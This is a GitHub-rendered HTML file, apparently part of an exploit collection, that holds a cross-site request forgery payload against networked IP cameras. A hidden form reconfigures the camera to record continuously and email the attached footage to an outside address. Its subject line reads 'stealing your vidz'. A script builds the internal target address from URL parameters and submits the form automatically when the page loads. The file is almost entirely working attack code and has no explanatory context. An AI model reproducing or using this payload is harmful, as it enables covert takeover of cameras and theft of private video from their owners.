-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathiframe-tplink2.html
72 lines (62 loc) · 3.78 KB
/
iframe-tplink2.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
<html>
<title>
</title>
<body>
<form id="pwnit2" action="willbereplaced/cgi-bin/CGIProxy.fcgi">
<input type="hidden" name="RecorderPrefix" value="1234" />
<input type="hidden" name="Event.E.Name" value="in ur webcam" />
<input type="hidden" name="Event.E.Type" value="S" />
<input type="hidden" name="Event.E.Enabled" value="yes" />
<input type="hidden" name="Event.E.SWInput" value="x" />
<input type="hidden" name="Event.E.ADInput" value="x" />
<input type="hidden" name="Event.E.Weekdays" value="1111111" />
<input type="hidden" name="Event.E.Starttime" value="0:0" />
<input type="hidden" name="Event.E.Duration" value="24:0" />
<input type="hidden" name="Event.E.ScheduleInterval" value="60" />
<input type="hidden" name="Event.E.RecorderPrefix" value="1234" />
<input type="hidden" name="Event.E.Actions.A2.Protocol" value="" />
<input type="hidden" name="Event.E.Actions.A2.Duration" value="5" />
<input type="hidden" name="Event.E.Actions.A4.Protocol" value="" />
<input type="hidden" name="Event.E.Actions.A4.Server" value="" />
<input type="hidden" name="Event.E.Actions.A4.Duration" value="" />
<input type="hidden" name="Event.E.Actions.A5.Protocol" value="SMTP" />
<input type="hidden" name="Event.E.Actions.A5.EmailTo" value="spam@blacktraffic.co.uk" />
<input type="hidden" name="Event.E.Actions.A5.Subject" value="stealing your vidz " />
<input type="hidden" name="Event.E.Actions.A5.Message" value="stealing your vidz " />
<input type="hidden" name="Event.E.Actions.A5.Attached" value="yes" />
<input type="hidden" name="Event.E.Actions.A7.Protocol" value="" />
<input type="hidden" name="Event.E.Actions.A7.Server" value="" />
<input type="hidden" name="Event.E.Actions.A7.Message" value="" />
<input type="hidden" name="Event.E.Actions.A8.Protocol" value="" />
<input type="hidden" name="Event.E.Actions.A8.Server" value="" />
<input type="hidden" name="Event.E.Actions.A8.Message" value="" />
<input type="hidden" name="Event.E.Actions.A8.CustomParams" value="" />
<input type="hidden" name="Event.E.Actions.A9.Protocol" value="" />
<input type="hidden" name="Event.E.Actions.A9.DiskID" value="" />
<input type="hidden" name="Event.E.Actions.A9.Duration" value="" />
<input type="hidden" name="Event.E.Actions.A10.Protocol" value="" />
<input type="hidden" name="Event.E.Actions.A10.Server" value="" />
<input type="hidden" name="Event.E.Actions.A10.Duration" value="" />
<input type="hidden" name="group" value="Event" />
<input type="hidden" name="action" value="add" />
<input type="hidden" name="redirect" value="asp/event.asp" />
<input type="submit" value="Submit request" />
</form>
<script>
function gup( name, url ) {
if (!url) url = location.href;
name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
var regexS = "[\\?&]"+name+"=([^&#]*)";
var regex = new RegExp( regexS );
var results = regex.exec( url );
return results == null ? null : results[1];
}
var lastOctet = gup('octet', window.location.href );
var network = gup('network', window.location.href );
var iform;
iform=document.getElementById("pwnit2");
iform.action = "http://"+network+"."+lastOctet.toString()+"/cgi-bin/admin/config.cgi";
iform.submit();
</script>
</body>
</html>